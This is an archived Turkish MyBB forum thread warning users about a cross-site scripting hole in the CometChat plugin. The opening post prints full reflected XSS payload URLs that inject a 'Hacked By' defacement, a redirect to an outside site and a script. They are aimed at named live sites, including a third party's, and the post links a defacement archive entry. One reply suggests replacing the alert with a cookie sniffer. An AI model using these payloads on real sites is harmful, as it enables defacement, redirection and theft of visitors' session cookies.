MyBB Depo Forum

Orjinalini görmek için tıklayınız: CometChat Plugin Açığı [HACK Yiyebilirsiniz]
Şu anda (Arşiv) modunu görüntülemektesiniz. Orjinal Sürümü Görüntüle internal link
Sayfalar: 1 2
Arkadaşlar Cometchat eklentisini mybb kullanıcıları facebook vs. gibi bir görünüme sahip olduğundan ve güzel bir plugin olduğundan tercih ediyor, ama size önermiyorum. Bu eklentide açıklar mevcut.

Örnek bir link:
Kod:
http://cryptr.org/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3Cimg%20src=http://www.forumtarz.com/images/logo3.png%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%221;URL=http://forumtarz.com/NmDahmeT/%22%3E%3Cscript%3Ealert%28%22ownz%20NmDahmeT%20-%20FT%22%29%3C/script%3Ehttp://cryptr.org/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3C

Bu adreste olmuyor, lakin zone alınca yönlendirme işliyor.

Zone:
Kod:
http://golgeler.net/view-%3E302959

Site sunumlarında gezerken bir site gördüm oradada var bu eklenti.

Site adresi:
Kod:
http://www.teknology.bl.ee

Açık;
Kod:
http://www.teknology.bl.ee/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3Cimg%20src=http://www.forumtarz.com/images/logo3.png%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%221;URL=http://forumtarz.com/NmDahmeT/%22%3E%3Cscript%3Ealert%28%22ownz%20NmDahmeT%20-%20FT%22%29%3C/script%3Ehttp://teknology.bl.ee/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3C

Not;
Kod:
http://www.teknology.bl.ee
sitesi plugini ziyaretçilere gizlemiş üye olup bakarsanız oradada aynı açık var, bu eklentiyi ya kullanmayın yada ziyaretçilere gizleyin.

İyi forumlar !
Warez olan bir eklentiden açık olmamasını nasıl bekleyebilirizki ?
(01-03-2014, Saat:21:17)Smyrna35 Adlı Kullanıcıdan Alıntı: [ -> ]Warez olan bir eklentiden açık olmamasını nasıl bekleyebilirizki ?

Çok doğru hocam, inşallah kullanmazlar bu ve benzeri pluginleri..
Aynen Öyle Fakat Nasıl İndex Atıyorlarki O Açık İle Tedbirimizi Alalım.
Xss vuln. Googlede xss acigi kapatma diye aratirsaniz bulabilirsiniz.
Öncellikle başlık yanlış olmuş.Başlık sanki bütün eklentilerden hack yiyebileceğimizi gösteriyor.
başlığı değiştirdim.
Xss alert vericegine bi sniffer çaksan cooikeleri çekersin gölgeler.net'in sahibi arkadaşimiz böyle giderse xss'li siteleri zone almayi yasaklicagiz Açık Ağızlı Gülümseme
Sayfalar: 1 2